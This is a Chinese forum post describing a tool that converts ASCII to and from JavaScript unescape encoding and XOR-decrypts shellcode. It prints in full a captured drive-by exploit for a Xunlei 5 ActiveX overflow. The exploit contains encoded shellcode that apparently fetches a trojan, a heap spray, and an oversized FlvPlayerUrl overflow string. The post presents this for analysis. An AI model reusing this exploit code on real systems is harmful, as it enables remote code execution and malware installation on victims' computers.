热搜词
发表于 2011-8-5 08:20:29 | 显示全部楼层 |阅读模式
本帖最后由 灰儿 于 2011-8-5 10:29 编辑

软件名称:ASCII码与unescape相互转换器
发布日期:2007年11月22日
电子邮箱:coderui@163.com
网站地址:http://hi.baidu.com/coderui
程序亮点:支持迅雷5(0-Day)溢出漏洞SHELLCODE汇编异或解密
---------------------------------------------------------------------------------------
简单说明:
  网络上最近新出现了一种漏洞“迅雷5(0-Day)溢出漏洞CLSID:F3E70CEA-956E-49CC-B444-73AFE593AD7F”,这个漏洞应该有人已经发布了制作SHELLCODE的工具,截获该工具程序生成出来的代码如下。我们使用unescape方法解密后,发现没有显示出来木马下载地址,这是因为被unescape解密前的汇编代码中有异或(XOR)加密。使用本软件《ASCII码与unescape相互转换器》程序中的[unescape码->ASCII码(XOR)]功能就可以直接解密出来经过异或(XOR)加密的全部代码了,当然同时也会以明文的方式显示出来木马的下载地址。

  我正在设计一种非常好用的脚本解密工具,因为目前网络上没有该“迅雷5溢出漏洞”SHELLCODE经过异或(XOR)加密后的解密工具,所以我就提前把这个解密模块给放出来了,希望对大家有用。本程序算法不是很成熟,只是在开发测试阶段,会慢慢更新的。大家有解密不开的SHELLCODE代码可以发给我,电子油箱为:coderui@163.com,我分析完毕后会马上升级程序的。

功能模块:
ASCII码->unescape码       说明:ASCII码转换为unescape码。
unescape码->ASCII码       说明:unescape码转换为ASCII码。
unescape码->16进制码      说明:unescape码转换为16进制码。
16进制码->unescape码      说明:16进制码转换为unescape码。
unescape码->ASCII码(XOR) 说明:专门用来解密“迅雷5(0-Day)溢出漏洞CLSID:F3E70CEA-956E-49CC-B444-73AFE593AD7F”SHELLCODE经过异或(XOR)加密的unescape代码。
16进制码异或运算器        说明:如果解密unescape代码后的汇编代码中的异或(XOR)加密算发改变了,那么您可以结合[unescape码->16进制码]功能和[16进制码异或运算器]功能来手动分析解密。


---------------------------------------------------------------------------------------
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<SCRIPT language="JavaScript">
var expires = new Date();
expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
var set_cookie = document.cookie.indexOf("3Ware=");
if (set_cookie == -1){document.cookie = "3Ware=1;expires=" + expires.toGMTString();
document.write('<object id="gl" classid="clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F"></object>');
var helloworld2Address = 0x0c0c0c0c;
var shellcode = unescape("%u10eb%u4b5b%uc933%ub966%u029b%u3480%ufe0b%ufae2%u05eb%uebe8%uffff%u17ff%ufcc4%ufefe%u94a1%ua7ce%u759a%u75ff%uf2be%u8e75%u53e2%u9675%u75f6%u9409%ua7f9%u2416%ufeff%u1cfe%ube07%uc67e%u8b3d%u7704%udab8%u9196%ufe90%u96fe%u8c8b%u9392%u94aa%ua7ff%uf875%u5e16%ufeff%u6bfe%u4a16%ufeff%u73fe%uc940%ufeff%ua9fe%u0196%ufefe%u01fe%ufaa8%u39fd%ufe39%u80a2%ud080%ube39%u9bfa%u9b86%ua9fe%ua801%ucdf6%uad25%ua9ad%ub873%uaec6%u01ad%ue2a8%u9294%u9096%u9a8a%uaa92%uff94%u75a7%u16f8%uffa7%ufefe%u1675%ubefd%u75c2%ue2b6%u8675%ufdd2%u9a03%ueb75%ufece%ufefe%u6c75%ufe56%ufefe%u0f96%udbb3%u962b%ub30f%u2bdb%u3796%ua0ac%u01ad%u6aca%ub871%u39d6%ud2b8%u7fb3%uefce%u4696%ufecc%u96fe%uce46%ufefe%u4696%ufed7%u75fe%u6afa%ub99e%uf9c7%ufc8a%u071c%u8077%u9fce%u4696%uffe1%u96fe%ueb46%ufeff%u4696%ufe0e%u75fe%u6afa%uc7b9%u8af9%u1cfc%u7707%uca80%ufe94%u9b96%ucd92%u96cc%u9b95%u908c%u94aa%ua7ff%uf875%u2c16%ufefe%u75fe%ufd26%uc2be%u3e7d%u75e6%u9686%u05fd%u817d%ufeee%u8b8a%ub175%ufdf2%u7f35%u90c7%u9a8a%u8b92%u759d%ufdd1%u7d15%ufe83%u8afe%u75a7%ufebb%uba73%ufce6%u37cd%u40f1%uc4ee%u8a28%u3ff6%uf937%u34fd%u15be%uc50f%ud6b0%ue48b%ud59e%ufdd1%uee91%uaaae%ufa94%ufa94%u01ab%ue6a8%u01a6%uce88%ubb71%u9ffe%ue315%ub0c5%u8bd2%u9ee6%ud1d5%u91fd%uaeee%u94aa%u94fa%uabfa%ua801%ua6e6%u8801%u71ca%ufebb%u7d9f%ufa3b%u5f15%u397d%u15ea%u757b%uea80%u94aa%u94fa%ua981%ua801%u39e6%u96f9%uf4f6%ucdfe%u763e%ufab9%u0275%uec94%u55a7%u031c%u3998%udaba%uffc2%u75ff%u7302%ueeb9%uaea9%uafaf%uafaf%uafaf%u73af%uc978%ufeff%uaefe%ua801%u7ff2%u763a%ufeff%u3cfe%ufede%ua801%u75ee%udaa8%ua5bf%ufdac%ufd1f%ufd1f%ufd1f%u7d1f%ufa12%uada4%u2475%u091c%u01ac%uaf1e%u75a8%uc28b%u8a75%u86d0%u0bfd%u75a8%ude88%u0bfd%u37cd%ubfb7%ufd53%ucd3b%uf125%uee40%u28c4%uf68a%u353f%ufdf9%ube24%u0f15%ue1c5%u198b%u75a0%udaa0%u23fd%u7598%ub5f2%ua075%ufde2%u7523%u75fa%u3bfd%ua055%u3da7%u3f16%u0103%ucc01%u6f8a%uc7f2%u831c%u877d%u18c7%u3766%u5842%u9d95%u2f77%u0eb1%u85b6%ue0c3%u9a5a%u7e11%u5128%ub364%uce7f%ufeef%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%u96fe%u8a8a%uc48e%ud1d1%u8989%ud089%ucd89%ud39d%u8c91%ud099%u919d%ud193%ucd89%ud09d%u869b%ufe9b");
var hbshelloworld = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = hbshelloworld - (payLoadSize+0x38);
var spraySlide = unescape("%u0c0c%u0c0c");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (helloworld2Address - 0x100000)/hbshelloworld;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
      memory = spraySlide + shellcode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
      spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
var size_buff = 1070;
var x = unescape("%0c%0c%0c%0c");
while (x.length<size_buff) x += x;
gl.FlvPlayerUrl = x;
}
</SCRIPT>
<script>
if (set_cookie == -1){
location.reload();
}
</script>
---------------------------------------------------------------------------------------
16进制码异或运算器

ASCII码与unescape相互转换器


01.jpg
全部评论0
回复
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|管理员之家 ( 苏ICP备2023053177号-2 )

GMT+8, 2024-12-25 15:19 , Processed in 0.167807 second(s), 25 queries .

Powered by Discuz! X3.5

Cpoyright © 2001-2024 Discuz! Team